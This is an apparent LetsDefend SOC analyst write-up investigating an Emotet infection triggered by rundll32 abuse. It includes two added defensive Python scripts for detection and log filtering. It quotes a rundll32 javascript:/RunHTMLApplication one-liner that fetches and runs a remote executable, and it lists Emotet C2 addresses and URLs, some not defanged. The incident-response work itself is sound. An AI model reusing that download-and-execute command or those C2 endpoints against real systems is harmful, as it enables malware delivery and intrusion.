LetsDefend level 1 alert SOC125 - Suspicious Rundll32 Activity event-id 58
Details
EventID: 58
Event Time: Feb. 14, 2021, 12:13 p.m.
Rule: SOC125 - Suspicious Rundll32 Activity
Level: Security Analyst
Source Address: 172.16.17.49
Source Hostname: EmilyComp
File Name: KBDYAK.exe
File Hash: a4513379dad5233afa402cc56a8b9222
File Size: 848.00 Kb
Device Action: Allowed
Download (Password:infected): a4513379dad5233afa402cc56a8b9222.zip
Playbook
Define Threat Indicator
Answer: Other
Check if the malware is quarantined/cleaned
EndpointManagement
CMD History
- 05.12.2020 16:12: cd
- 05.12.2020 16:13: dir
- 05.12.2020 16:14: cd Users
- 05.12.2020 16:15: dir
- 05.12.2020 16:16: cd Emily
- 05.12.2020 16:17: cd Desktop
- 05.12.2020 16:18: type notes.txt
- 14.02.2021 12:12: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'

The http[:]//ru-uid-507352920.pp.ru/KBDYAK.exe fetched by that rundll32.exe execution is suspicious.
VirusTotal: https://www.virustotal.com/gui/domain/ru-uid-507352920.pp.ru
urlscan: https://urlscan.io/result/4367cc1e-3aa3-468f-8cdf-846fe7335793/#summary
Verdict: malicious. The VirusTotal results show that the files communicating with this domain are all flagged red.
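As an added defender-side example (not part of the original writeup), a small Python checker that flags rundll32.exe command lines using the javascript: protocol handler, mshtml's RunHTMLApplication, or a remote GetObject('script:...') scriptlet, run over a constructed command history that includes the entry from this alert; the indicator names are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlparse

# Heuristics for the rundll32.exe abuse seen in this alert. The indicator names
# are assumptions for illustration, not a vendor rule set.
SUSPICIOUS_PATTERNS = {
    "script-protocol-handler": re.compile(r"\b(javascript|vbscript):", re.I),
    "runhtmlapplication":      re.compile(r"RunHTMLApplication", re.I),
    "remote-scriptlet":        re.compile(r"GetObject\(\s*['\"]script:", re.I),
    "remote-url":              re.compile(r"https?://[^\s'\")]+", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def analyze_rundll32(cmdline: str) -> dict:
    """Return matched indicators and any remote URL for a rundll32 command line."""
    if not re.search(r"rundll32(\.exe)?\b", cmdline, re.I):
        return {"suspicious": False, "indicators": [], "url": None, "host": None}
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmdline)]
    m = URL_RE.search(cmdline)
    url = m.group(0) if m else None
    return {"suspicious": bool(hits), "indicators": hits, "url": url,
            "host": urlparse(url).hostname if url else None}


# Constructed command history: a benign rundll32 call plus the entry from this alert.
SAMPLE_CMD_HISTORY = [
    "05.12.2020 16:18: type notes.txt",
    "14.02.2021 12:10: rundll32.exe shell32.dll,Control_RunDLL",
    "14.02.2021 12:12: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';"
    "document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'",
]


def scan_history(lines):
    """Yield (timestamp, analysis) for every suspicious rundll32 entry."""
    findings = []
    for line in lines:
        ts, _, cmd = line.partition(": ")   # "dd.mm.yyyy hh:mm: <command>"
        result = analyze_rundll32(cmd)
        if result["suspicious"]:
            findings.append((ts, result))
    return findings


if __name__ == "__main__":
    for ts, r in scan_history(SAMPLE_CMD_HISTORY):
        print(ts, r["indicators"], r["host"])
```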
Network Connections
- 2020-12-05 12:13: 140.82.121.4
- 2020-12-05 12:14: 172.217.169.110
- 2020-12-05 22:13: 172.217.169.110
- 2020-12-05 22:14: 172.217.169.110
- 2020-12-05 22:15: 172.16.17.49
- 2020-12-05 22:16: 216.58.206.174
- 2021-02-14 12:12: 67.68.210.95
- 2020-02-14 12:13: 162.241.242.173

Are 67.68.210.95 and 162.241.242.173 the addresses involved in this alert?
- 67.68.210.95
VirusTotal: https://www.virustotal.com/gui/ip-address/67.68.210.95
ip-sc: https://ip-sc.net/ja/r/67.68.210.95
AbuseIPDB: Not found
The community reviews also mention a link to Emotet.
- 162.241.242.173
VirusTotal: https://www.virustotal.com/gui/ip-address/162.241.242.173
ip-sc: https://ip-sc.net/ja/r/162.241.242.173
AbuseIPDB: Not found
Emotet?
Process History
- AcroRd32.exe MD5: 357b03e0b8d0c30713f2c41ce60583c5 Path: c:/program files (x86)/adobe/acrobat reader dc/reader/acrord32.exe
- Chrome.exe MD5: b015ecd030da9a979e6d1a3d25f8fd86 Size: 1.72 MB Path: c:/program files/internet explorer/iexplore.exe
- ccsvchst.exe MD5: aba0a9709e6c11bc0b6ee21de36743e3 Path: c:/program files (x86)/symantec/symantec endpoint protection/14/bin/ccsvchst.exe Size: 142.45 KB
- notepad.exe MD5: FC2EA5BD5307D2CFA5AAA38E0C0DDCE9 Size: 216 KB Path: c:/windows/system32/notepad.exe
- rundll32.exe command: rundll32.exe javascript:'../mshtml,RunHTMLApplication ';document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe')'
- KBDYAK.exe MD5: a4513379dad5233afa402cc56a8b9222 Size: 848.00 Kb

KBDYAK.exe did indeed run.
VirusTotal: https://www.virustotal.com/gui/file/ccd380ea868ffad4f960d7455fecf88c2ac3550001bbb6c21c31ae70b3bbf4f6
61/68!!!!!
Answer: Not Quarantined
Analyze Malware
An AnyRun analysis from the same period: https://app.any.run/tasks/35164fdb-34bc-4778-96e7-fdbaa21b218e/
The file dropped in this way is the following:
This is Emotet.
Write Registry
- Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content Name: CachePrefix Value: (value not set)
- Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies Name: CachePrefix Value: Cookie:
- Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History Name: CachePrefix Value: Visited:
- Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings Name: ProxyEnable Value: 0
- Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections Name: SavedLegacySettings Value: 46 00 00 00 A5 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 E3 33 BB EA B1 D3 01 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 7D 6C B0 50 D9 C5 73 F7 0B 00 00 00 00 00 00 00 6D 00 33 00 32 00 5C 00 4D 00 53 00 49 00 4D 00 47 00 33 00 32 00 2E 00 64 00 6C 00 01 00 00 00 04 AA 40 00 14 AA 40 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 C0 A8 01 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 80 5D 3F 00 98 37 40 00 00 08 00 00 02 00 00 00 00 00 00 60 00 00 00 20 60 04 00 00 B8 A9 40 00 02 00 00 00 88 02 00 00 60 04 00 00 B8 A9 40 00 04 00 00 00 F8 01 00 00 B2 84 00 00 88 B6 40 00 B8 4B 40 00 43 00 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Internet Explorer settings were modified.
Connections
- 45.55.36.51
- 37.70.8.161
- 162.241.242.173
- 45.55.219.163
- 46.105.131.79
- 78.24.219.147
- 68.188.112.97
- 67.68.210.95
HTTP/HTTPS requests
- http[:]//67.68.210.95/K94d4BuWIzlOK/cGT0xBMOeVnh/
- http[:]//162.241.242.173:8080/bAg9s0/Muke10/sLGB0Z5BBYBm8/
- http[:]//45.55.36.51:443/g3bT/X7IhfMIzGl5mxg/y040km/ekgBVK85a0VlL/RrybngSesi5eeg/
- http[:]//45.55.219.163:443/pbzV/AkFGwPqfDbGT8m/QKGk59oXuP/
- http[:]//68.188.112.97/6lsUqSoDIWP6cDvQzs/WEEkg/g9rvy3yhkE2ITGP/
- http[:]//46.105.131.79:8080/jGgoU5Bk/rwqQCjYSH37wpNz/2GpI9xsKcQH5d26i8q/
- http[:]//78.24.219.147:8080/htGuq4cceB/
- http[:]//37.70.8.161/Jp3o3IFy/0o8VqcG/6SUYBOD345yvNLMM/rXnHml6/xa52efTt/
Answer: Malicious
Check If Someone Requested the C2
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
2 | Aug, 29, 2020, 10:32 PM | Proxy | 172.16.17.14 | 57441 | 67.68.210.95 | 80 |
354 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 14474 | 67.68.210.95 | 80 |
355 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 13434 | 162.241.242.173 | 8080 |
Record #2:
- Request URL: http://67.68.210.95/HX8tpawYAxLaiFMTGa1/1dG3m5wmqVifrhsZXsG/
- Request Method: POST
- Device Action: Permitted
- Process: rasser.exe
- Parent MD5: bac591433cdada740aab065885d408bc

This one may not be related to the current alert, but there may have been earlier Emotet-related activity as well.

Record #354:
- URL: http://67.68.210.95/2SjAcA5VhhJiFjBQ/vvszin6AicmidnG5bg/DaDVVYvfEHlcIIcgcu/0U5UiIkaHankrHGa/FYSJmdQDj2ejni1UI/
- Device Action: Allowed

Record #355:
- URL: http://162.241.242.173:8080/HQ9TemntfBzghL/3wz57awaSHlQrrnP/S78n2aUqY7U/
- Device Action: Allowed
Answer: Accessed
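Added example, not from the original writeup: a Python helper that parses proxy-log rows in the layout of the table above, keeps only connections to the two C2 addresses identified earlier, and groups them by internal source, optionally restricted to a time window around the alert. The sample rows are constructed (three copied from the table, plus one benign row to a documentation address so the filter has something to discard).

```python
from collections import defaultdict
from datetime import datetime

# C2 addresses identified earlier in this investigation.
C2_IPS = {"67.68.210.95", "162.241.242.173"}
TIME_FMT = "%b, %d, %Y, %I:%M %p"   # matches "Feb, 14, 2021, 12:13 PM"

# Constructed proxy-log rows in the layout of the table above; the last row is a
# benign connection (RFC 5737 documentation address) added for contrast.
SAMPLE_PROXY_ROWS = [
    "2 | Aug, 29, 2020, 10:32 PM | Proxy | 172.16.17.14 | 57441 | 67.68.210.95 | 80 |",
    "354 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 14474 | 67.68.210.95 | 80 |",
    "355 | Feb, 14, 2021, 12:13 PM | Proxy | 172.16.17.49 | 13434 | 162.241.242.173 | 8080 |",
    "356 | Feb, 14, 2021, 12:20 PM | Proxy | 172.16.17.51 | 40101 | 203.0.113.10 | 443 |",
]


def parse_row(row):
    """Split one 'id | date | type | src | sport | dst | dport |' row into a dict."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    num, date, typ, src, sport, dst, dport = cells
    return {"id": int(num), "time": datetime.strptime(date, TIME_FMT), "type": typ,
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport)}


def hosts_that_reached_c2(rows, c2_ips=C2_IPS, alert_time=None, window_minutes=None):
    """Group C2 connections by internal source address.

    When alert_time (a string in TIME_FMT) and window_minutes are given, only rows
    within that many minutes of the alert are kept; this separates the current
    incident (#354/#355) from older hits such as #2 that need their own follow-up.
    """
    pivot = datetime.strptime(alert_time, TIME_FMT) if alert_time else None
    by_src = defaultdict(list)
    for row in rows:
        r = parse_row(row)
        if r["dst"] not in c2_ips:
            continue
        if pivot is not None and window_minutes is not None:
            if abs((r["time"] - pivot).total_seconds()) > window_minutes * 60:
                continue
        by_src[r["src"]].append((r["id"], r["dst"], r["dport"]))
    return dict(by_src)


if __name__ == "__main__":
    print(hosts_that_reached_c2(SAMPLE_PROXY_ROWS))
    print(hosts_that_reached_c2(SAMPLE_PROXY_ROWS, alert_time="Feb, 14, 2021, 12:13 PM", window_minutes=5))
```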
Containment
Containment!
Add Artifacts
Value | Type | Comment |
---|---|---|
a4513379dad5233afa402cc56a8b9222 | MD5 Hash | drops Emotet |
http[:]//67.68.210.95/2SjAcA5VhhJiFjBQ/vvszin6AicmidnG5bg/DaDVVYvfEHlcIIcgcu/0U5UiIkaHankrHGa/FYSJmdQDj2ejni1UI/ | URL Address | Emotet |
http[:]//162.241.242.173:8080/HQ9TemntfBzghL/3wz57awaSHlQrrnP/S78n2aUqY7U/ | URL Address | Emotet |